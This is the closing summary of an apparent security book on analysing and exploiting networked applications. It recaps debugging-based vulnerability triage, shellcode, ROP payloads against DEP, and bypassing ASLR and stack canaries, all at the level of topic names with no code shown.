Finding and exploiting vulnerabilities in a network application can be difficult, but this chapter introduced some techniques you can use. I described how to triage vulnerabilities to determine the root cause using a debugger; with the knowledge of the root cause, you can proceed to exploit the vulnerability. I also provided examples of writing simple shell code and then developing a payload using ROP to bypass a common exploit mitigation DEP. Finally, I described some other common exploit mitigations on modern operating systems, such as ASLR and memory canaries, and the techniques to circumvent these mitigations.

This is the final chapter in this book. At this point you should be armed with the knowledge of how to capture, analyze, reverse engineer, and exploit networked applications. The best way to improve your skills is to find as many network applications and protocols as you can. With experience, you’ll easily spot common structures and identify patterns of protocol behavior where security vulnerabilities are typically found.

..................Content has been hidden....................

You can't read the all page of ebook, please click here login for view all page.
Reset